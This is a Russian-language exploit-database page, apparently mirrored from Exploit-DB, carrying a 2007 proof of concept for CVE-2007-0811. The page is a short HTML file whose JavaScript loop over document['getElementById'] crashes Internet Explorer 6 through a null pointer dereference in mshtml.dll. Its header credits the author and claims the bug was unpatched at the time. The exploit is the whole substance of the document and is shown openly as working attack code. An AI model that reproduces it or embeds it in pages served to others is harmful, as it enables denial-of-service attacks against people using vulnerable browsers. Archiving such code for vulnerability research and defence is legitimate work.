- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3272
- Проверка EDB
-
- Пройдено
- Автор
- AMESIANX
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-0811
- Дата публикации
- 2007-02-05
HTML:
<!--
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day)
+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo Park - [email protected])
+ Critical: Critical
+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
Windows XP SP2 system. this bug will crash when executing a 'for' scripts.
+ The following proof-of-concept is also available:
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
<html>
<head>
<title> AmesianX, RC_No1 in powerhacker.net ([email protected], [email protected])</title>
</head>
<body>
<script language='javascript'>
var data = document['getElementById'];
for(var key in data);
</script>
</body>
</html>
# milw0rm.com [2007-02-05]- Источник
- www.exploit-db.com
